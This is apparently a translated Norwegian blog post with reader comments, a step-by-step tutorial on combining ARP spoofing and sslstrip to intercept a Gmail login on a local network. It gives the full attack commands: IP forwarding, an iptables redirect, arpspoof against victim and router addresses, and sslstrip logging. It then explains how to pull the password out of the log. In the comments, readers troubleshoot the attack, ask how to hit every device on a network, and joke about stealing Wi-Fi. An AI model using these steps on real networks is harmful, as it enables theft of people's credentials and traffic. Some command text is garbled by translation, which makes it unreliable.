Hei bloggere.
For i dag har jeg et lite utvalg av hvor farlig det kan være å være koblet i et hvilket som helst nettverk uten sikkerhet for de som så mange av oss liker.
For i dag skal jeg bruke ArpSpoofing med Sslstrip for å få et Gmail-passord. For å gjøre miljøet mer kontrollert har jeg opprettet en konto som heter "testarp@gmail.com".
Og siden jeg ikke liker innledningen veldig, la oss komme i gang.
MILJØ
For denne testen har vi følgende:
1. angriper: Det er min stasjonære eller stasjonære datamaskin som har Debian Wheezy. Fra arkiver kan du installere sslstrip y dsniff å få til å ha harpspoofing
2. Offer: Offeret er en Android-nettbrett som bare vil se e-posten sin gjennom nettleseren.
3. Medium: Midten er min Cisco DPC2425-ruter
ADRESSER.
Angriperadresse: 172.26.0.2
Ruteradresse: 172.26.0.1
Offerets adresse: 172.26.0.8
ANGREPET:
Det første vi vil gjøre for dette angrepet er å aktivere fremover slik at datamaskinen vår kan videresende informasjonen til offeret uten at de merker det. (Ellers ville det være et nektelse av tjenesteanfall)
For det vil vi bruke:
echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080
arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
arpspoof -i eth0 -t 172.26.0.1 172.26.0.2
sslstrip -a -w desdelinux -l 8080
Nå hvis vi gjør hale -f desdelinux vi ser informasjonen live og direkte
Så hvordan får vi det vi vil ha?
La oss først skrive inn e-posten vår på nettbrettet. Mens vi logger på ser vi at tusenvis av ting vises på konsollen vår.
Nå som den er ferdig, la oss åpne filen vår "desdelinux" med nano
nano desdelinux
med Control + W søker vi etter noe som heter SIKKER POST.
Og vi får se noe slikt.
Blant den enorme linjen som ikke kan sees, er offerets e-post og passord.
Så vi løper til høyre til vi endelig ser lyset ved enden av tunnelen.
Ved en annen anledning vil vi se hvordan vi kan beskytte oss litt mot disse angrepene.
Hilsen
Jeg benytter anledningen til å si at da innlegget ble publisert, var ikke kommandoene riktig.
Kommandoen iptables på slutten mangler 8080 som er på en annen linje. Og så var arpspoof-kommandoene på samme linje. Hver kommando er på en annen linje.
Forhåpentligvis ser redaktøren det og kan fikse det.
Hilsener.
Jeg har gjort rettelsene du nevner, er det greit?
Hvis du skal sette inn kode i en foretrukket oppføring, bruk HTML-visningen og kontroller at artikkelen er korrekt før du sender den til ventende. Takk skal du ha.
Det er frysende å vite at de av oss som ikke har kunnskap er så sårbare. Veldig god informasjon, selv når jeg forstår lite av emnet, skjønner jeg viktigheten. Takk skal du ha!
Hilsen
Men det fungerer bare hvis angriperen og offeret er på samme nettverk. I alle fall ser det ut til at hvis du (i samme nettverk) kobler til ved hjelp av HTTPS, skjer det ikke fordi dataene er kryptert FØR du forlater maskinen. Hvis du kobler til via HTTP (uten S), tror jeg at selv om du ser på nettverkskabelen, ser du nøklene.
Det er ikke sant. Jeg hakker en gmail-nøkkel, og hvis du merker, bruker gmail https. Så? Poenget er at selv om https er sikkert, avhenger det av http. Så det er ikke så trygt.
Tilstå ikke så mye om en https at S ikke er for Superman, det er for "trygt"
det fungerer med eller uten https, jeg har prøvd det med en mer spesialisert Linux distro og det fungerer uten problemer
Du kan nettopp bruke den til å lære de som stjeler Wi-Fi en leksjon. 😀
Det er mer eller mindre som det de sa for lenge siden på Chema Alonsos blogg:
http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba.html
http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba_5.html
Ostia, flott hva det gjør! / Og så forteller de paranoiden min hver gang jeg bruker VPN når de skal sjekke bankkontoen ...). Forresten må du se hvor kyniske folk er i kommentarene ... hvis det til slutt stjeler ...
Nå må vi ta en veiledning om hvordan du oppretter og tilbyr din egen VPN-tjeneste.
Historien du kobler til er veldig interessant, den virker til og med verdig en romanbok, og dette får meg til å huske da jeg brukte internett til naboene mine, og selv om jeg sier jeg kjenner emnet, tror jeg at jeg aldri kunne se de sanne dimensjonene til faren for at jeg kunne vare, heldigvis for meg, endret de bare passordet til WPA2, og det var der historien min med ISP begynte haha
Det er derfor tittelen sier Sslstrip i aksjon.
Det fungerer, så lenge angriperen er i midten
Hvilken bølge jobber du med prisme? -.-
nei.
Hva venter du på å sende forespørselen din XD
hilsen
bra innlegg
Interessant, jeg skal ta en pedagogisk test senere ... Kanskje jeg til og med kan fjerne passordet til WiFi og ha det gøy litt 😛
Uansett, kan du gjøre noe lignende for å sende forskjellige sider til de målene ønsket? For eksempel vil de åpne Facebook, og jeg omdirigerer dem til Google? 😛
Ja. Men det er en helt annen rull.
Kanskje jeg legger det ut senere.
veldig bra innlegg, disse emnene er veldig lærerike, nå må vi kunne motvirke dette angrepet, siden noen (som meg) kobler seg til offentlige nettverk (universitetet for eksempel) vil det være nyttig å unngå det.
Greetings!
Det fungerte ikke for meg 🙁
Noe svikter meg her, bortsett fra at https-tilkoblingene er kryptert gjennom et serversertifikat (når du har sertifikatet på maskinen din, er nettleseren din ansvarlig for kryptering) med iptables omdirigerer du port 80 (http), ikke 443 som er https
Jeg trodde det også. Poenget er at selv om https er "sikkert", avhenger det dessverre av http. Så sslstrip utnytter det, det får nettleseren til å tro at den bruker https-legitimasjon, men det er det ikke.
hellig dritt! men nettleseren skal se en advarsel som "dette sertifikatet kommer fra et mistenkelig nettsted eller noe sånt" ... Jeg må definitivt gjøre tester XD
Nei, absolutt ingenting kommer ut.
Det fungerte til slutt for meg
Jeg er koblet til et WEP-nettverk med passord, og det viste meg passordet uansett.
En forespørsel. Kan du gjøre den samme prosedyren, men for alle datamaskiner som er koblet til nettverket, i stedet for å ha et enkelt offer?
Ja det kan du. Men jeg har ikke gjort eksperimenter. Prøv det selv og fortell oss hvordan du har det.
Det eneste jeg får med dette er at offerets maskin går offline, men sslstripen viser meg ingenting: /
Du må deaktivere brannmuren et øyeblikk. Eller i det minste aktivere innkommende tilkoblinger.
Probe og jeg kunne bare se brukernavnet og passordet til facebooksiden, i gmail fant jeg ikke noe resultat i loggen, også trengte jeg bare en linje med arpspoof «arpspoof -i -t«. På den annen side kunne ikke offermaskinen åpne noen sider. Jeg vil fortsette å undersøke, det er veldig interessant. En hjelp for de som bruker Manjaro, pakkene som skal installeres er: dsniff (her er arpspoff), vridd og python2-pyopenssl. Sslstrip kan lastes ned herfra: http://www.thoughtcrime.org/software/sslstrip/
For å kjøre det $ python2 sslstrip.py
Hilsener.
Det kom ikke ut, men arpspoof-linjen er: #arpspoof -i int -t ip-victim ip-router
jeg gjør akkurat det du sier:
ekko "1"> / proc / sys / net / ipv4 / ip_forward iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-ports 8080
arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
arpspoof -i eth0 -t 172.26.0.1 172.26.0.2
Problemet er at offeret, som er en annen pc som jeg har her på rommet mitt, blir stående uten forbindelse til det punktet at jeg må starte ruteren på nytt, hva kan jeg gjøre, hjelp meg.
En annen ting, jeg jobber med en virtuell maskin, og når jeg kjører iwconfig-kommandoen, vises ikke wlan0, og heller ikke når jeg kjører ifconfig, men hvis jeg har internett på den virtuelle maskinen min, hva med et eth0-grensesnitt.